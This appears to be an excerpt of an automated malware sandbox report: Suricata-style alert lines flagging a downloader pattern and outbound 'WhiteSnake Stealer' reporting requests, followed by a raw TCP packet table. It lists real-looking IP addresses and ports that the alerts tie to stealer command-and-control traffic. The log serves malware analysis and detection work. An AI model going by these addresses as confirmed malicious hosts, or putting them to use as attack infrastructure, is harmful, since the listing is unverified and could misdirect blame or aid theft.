2024-12-01T22:52:06.056136+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:06.199147+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:06.324209+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:06.324209+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.234459+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.363850+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.440453+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49751	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:07.580733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49752	172.217.19.164	80	TCP
2024-12-01T22:52:08.818855+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49757	172.217.19.164	80	TCP
2024-12-01T22:52:08.819268+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49756	172.217.19.164	80	TCP
2024-12-01T22:52:10.581610+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:10.701979+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:10.714046+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:10.834328+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.182407+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:11.333888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49762	172.217.19.164	80	TCP
2024-12-01T22:52:12.237552+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49766	140.238.218.94	8080	TCP
2024-12-01T22:52:12.394775+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:12.875098+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49761	172.217.19.164	80	TCP
2024-12-01T22:52:13.905488+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49769	46.235.26.83	8080	TCP
2024-12-01T22:52:15.885563+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49771	168.119.121.16	8080	TCP
2024-12-01T22:52:18.261636+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49774	51.77.125.62	8080	TCP
2024-12-01T22:52:21.851256+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.16	49773	192.0.78.152	443	TCP
2024-12-01T22:52:34.321664+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49776	46.235.26.83	8080	TCP
2024-12-01T22:52:36.273612+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49777	168.119.121.16	8080	TCP
2024-12-01T22:52:38.609521+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49778	51.77.125.62	8080	TCP
2024-12-01T22:52:40.309452+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49779	185.189.159.121	8001	TCP
2024-12-01T22:52:42.637687+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49780	65.21.49.163	8080	TCP
2024-12-01T22:52:45.131858+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49781	167.86.115.218	9090	TCP
2024-12-01T22:53:00.681488+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49782	185.189.159.121	8001	TCP
2024-12-01T22:53:02.437473+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49784	65.21.49.163	8080	TCP
2024-12-01T22:53:04.825507+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49785	167.86.115.218	9090	TCP
2024-12-01T22:53:07.161571+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49786	46.226.106.173	8080	TCP
2024-12-01T22:53:26.945492+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49787	46.226.106.173	8080	TCP
2024-12-01T22:53:38.825631+0100	2045868	ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound)	1	192.168.2.16	49790	77.240.38.138	8080	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2024 22:51:41.761394024 CET	49700	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:41.881529093 CET	80	49700	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:41.881705046 CET	49700	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:41.899389982 CET	49700	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:41.967824936 CET	49701	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:51:41.967884064 CET	443	49701	159.69.63.226	192.168.2.16
Dec 1, 2024 22:51:41.967943907 CET	49701	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:51:41.972171068 CET	49702	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.019309044 CET	80	49700	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:42.061467886 CET	49701	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:51:42.061516047 CET	443	49701	159.69.63.226	192.168.2.16
Dec 1, 2024 22:51:42.072638988 CET	49704	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.073216915 CET	49703	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.092261076 CET	80	49702	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:42.092513084 CET	49702	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.094588041 CET	49702	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.117055893 CET	49705	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.122435093 CET	49706	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.192771912 CET	80	49704	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.192920923 CET	49704	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.193080902 CET	80	49703	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.193152905 CET	49703	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.196475983 CET	49703	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.197175026 CET	49704	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.214468956 CET	80	49702	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:42.236996889 CET	80	49705	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.237099886 CET	49705	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.242470980 CET	80	49706	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.242579937 CET	49706	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.244020939 CET	49705	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.248301983 CET	49706	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.316385031 CET	80	49703	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.317019939 CET	80	49704	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.364001036 CET	80	49705	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.368227959 CET	80	49706	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.626386881 CET	49706	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.626421928 CET	49705	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.674439907 CET	49703	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.674439907 CET	49704	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.679909945 CET	49705	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.679980040 CET	49707	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.680649042 CET	49706	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.697989941 CET	49708	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.698327065 CET	49709	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.704725981 CET	49702	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.722862005 CET	49710	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.729801893 CET	49700	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.746525049 CET	80	49706	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.746543884 CET	80	49705	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.785923958 CET	49711	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:42.799969912 CET	80	49707	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.800090075 CET	49707	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.817945957 CET	80	49708	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.818046093 CET	49708	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.818212032 CET	80	49709	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.818495989 CET	49709	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.819439888 CET	49708	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.820607901 CET	49709	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:42.830339909 CET	49701	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:51:42.830506086 CET	49712	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:42.837512016 CET	80	49703	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.837548971 CET	80	49704	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.841453075 CET	80	49706	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.841512918 CET	80	49705	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.842864037 CET	80	49710	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:42.842946053 CET	49710	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.865506887 CET	80	49702	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:42.865739107 CET	49713	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.875332117 CET	443	49701	159.69.63.226	192.168.2.16
Dec 1, 2024 22:51:42.879621983 CET	49710	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:42.893527031 CET	80	49700	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:42.895097017 CET	80	49700	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:42.895206928 CET	49700	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.905870914 CET	80	49711	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:42.905965090 CET	49711	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:42.939477921 CET	80	49708	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.940572023 CET	80	49709	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:42.950552940 CET	80	49712	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:42.950675964 CET	49712	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:42.985651016 CET	80	49713	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:42.985743046 CET	49713	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.995469093 CET	49713	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:42.998729944 CET	49712	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:43.023684978 CET	49714	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:43.055077076 CET	80	49702	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:43.055164099 CET	49702	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:43.115395069 CET	80	49713	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:43.118613958 CET	80	49712	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:43.143842936 CET	80	49714	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:43.143994093 CET	49714	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:43.144803047 CET	49714	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:43.162448883 CET	80	49703	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:43.162575960 CET	49703	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:43.195862055 CET	80	49704	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:43.195938110 CET	49704	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:43.264797926 CET	80	49714	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:43.326472998 CET	80	49705	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:43.326545000 CET	49705	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:43.394989967 CET	80	49706	172.217.19.238	192.168.2.16
Dec 1, 2024 22:51:43.395066977 CET	49706	80	192.168.2.16	172.217.19.238
Dec 1, 2024 22:51:43.497827053 CET	443	49701	159.69.63.226	192.168.2.16
Dec 1, 2024 22:51:43.497906923 CET	49701	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:51:43.497932911 CET	49701	443	192.168.2.16	159.69.63.226
Dec 1, 2024 22:51:44.020318031 CET	80	49708	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:44.020503998 CET	80	49708	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:44.020560026 CET	49708	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:44.020966053 CET	80	49709	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:44.021039963 CET	80	49709	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:44.021089077 CET	49709	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:44.055542946 CET	49709	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:44.055723906 CET	49708	80	192.168.2.16	45.60.107.106
Dec 1, 2024 22:51:44.079840899 CET	49712	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.093626022 CET	49713	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:44.107379913 CET	49714	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.175370932 CET	80	49709	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:44.175555944 CET	80	49708	45.60.107.106	192.168.2.16
Dec 1, 2024 22:51:44.181730986 CET	80	49713	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:44.181807041 CET	49713	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:44.200231075 CET	80	49712	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.200314045 CET	49712	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.214267015 CET	80	49713	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:44.214327097 CET	49713	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:44.242553949 CET	49716	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.257925987 CET	80	49714	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.258008003 CET	49714	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.275331020 CET	49717	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.362468004 CET	80	49716	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.362654924 CET	49716	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.365362883 CET	49716	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.395375013 CET	80	49717	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.395461082 CET	49717	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.398880005 CET	49717	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.440388918 CET	49717	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.445969105 CET	49716	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.463046074 CET	49718	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:44.485325098 CET	80	49716	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.518830061 CET	80	49717	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.538028955 CET	49719	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.583199978 CET	80	49718	104.244.42.129	192.168.2.16
Dec 1, 2024 22:51:44.583261013 CET	49718	80	192.168.2.16	104.244.42.129
Dec 1, 2024 22:51:44.601457119 CET	80	49717	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.609623909 CET	80	49716	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.658035040 CET	80	49719	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.658108950 CET	49719	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.659006119 CET	49719	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:44.712625027 CET	49720	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:51:44.779009104 CET	80	49719	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:44.832776070 CET	80	49720	104.26.6.177	192.168.2.16
Dec 1, 2024 22:51:44.832880020 CET	49720	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:51:44.835586071 CET	49720	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:51:44.955630064 CET	80	49720	104.26.6.177	192.168.2.16
Dec 1, 2024 22:51:45.048809052 CET	49721	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:51:45.059746981 CET	49722	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.114573002 CET	49720	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:51:45.118748903 CET	49719	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.168929100 CET	80	49721	104.26.6.177	192.168.2.16
Dec 1, 2024 22:51:45.169045925 CET	49721	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:51:45.179794073 CET	80	49722	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.179872036 CET	49722	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.205415964 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.277538061 CET	80	49720	104.26.6.177	192.168.2.16
Dec 1, 2024 22:51:45.281430960 CET	80	49719	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.325529099 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.325623035 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.325810909 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.445871115 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.448544979 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.471842051 CET	80	49717	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.471945047 CET	49717	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.513919115 CET	80	49716	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.514028072 CET	49716	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.568631887 CET	80	49724	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.568730116 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.570065022 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.665606976 CET	49725	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:45.690001011 CET	80	49724	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.761230946 CET	80	49720	104.26.6.177	192.168.2.16
Dec 1, 2024 22:51:45.761306047 CET	49720	80	192.168.2.16	104.26.6.177
Dec 1, 2024 22:51:45.771680117 CET	80	49719	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:45.771759033 CET	49719	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:45.785640001 CET	80	49725	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:45.785770893 CET	49725	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:45.786318064 CET	49725	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:45.906379938 CET	80	49725	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:46.143419981 CET	49725	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:46.263545990 CET	80	49725	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:46.930413961 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:46.930476904 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:46.930640936 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:46.948532104 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:46.974678993 CET	80	49725	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:46.974833965 CET	80	49725	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:46.974950075 CET	80	49725	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:46.975039005 CET	49725	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:46.975079060 CET	49725	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:46.981806993 CET	49725	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:47.068619013 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.068856001 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.101892948 CET	80	49725	66.33.60.67	192.168.2.16
Dec 1, 2024 22:51:47.172521114 CET	80	49724	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.172575951 CET	80	49724	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.172718048 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.173799038 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.189488888 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.293911934 CET	80	49724	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.293989897 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.392343044 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.411010981 CET	49724	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.414001942 CET	80	49724	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.420069933 CET	49726	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.431735039 CET	49727	80	192.168.2.16	66.33.60.67
Dec 1, 2024 22:51:47.438987017 CET	49728	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.453290939 CET	49723	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.456988096 CET	49729	80	192.168.2.16	172.217.19.164
Dec 1, 2024 22:51:47.512485981 CET	80	49723	172.217.19.164	192.168.2.16
Dec 1, 2024 22:51:47.531670094 CET	80	49724	172.217.19.164	192.168.2.16
